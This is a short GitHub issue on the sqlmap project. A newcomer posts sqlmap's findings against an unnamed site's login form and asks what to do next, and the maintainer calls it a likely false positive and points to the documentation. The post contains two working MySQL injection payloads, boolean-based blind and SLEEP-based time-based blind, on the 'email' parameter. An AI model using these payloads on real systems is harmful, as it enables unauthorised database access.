### ISSUE TITLE
result 

### ISSUE THREAD

**Issue by malabdaly** [sqlmapproject/sqlmap#3791]
Thsi is the result of my sqlmap 
can i know what is the next step 
sorry i am new in this field
 
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: csrf_test_name=dfb0fd215aeea25b5bf20f3e5dfe9b97&email=admin') RLIKE (SELECT (CASE WHEN (8645=8645) THEN 0x61646d696e ELSE 0x28 END))-- Poxz&password=admin123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf_test_name=dfb0fd215aeea25b5bf20f3e5dfe9b97&email=admin') AND (SELECT 7634 FROM (SELECT(SLEEP(5)))pRzj)-- ULzT&password=admin123

**Comment by stamparm** [comment]
1) It looks like a false-positive. Please rerun with `--flush-session`
2) Please read everything at [Usage](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Afterwards it should be pretty clear to you what should be run. This way, with 0 research from your side, it doesn't make much sense from me to put you here numerous switches and options
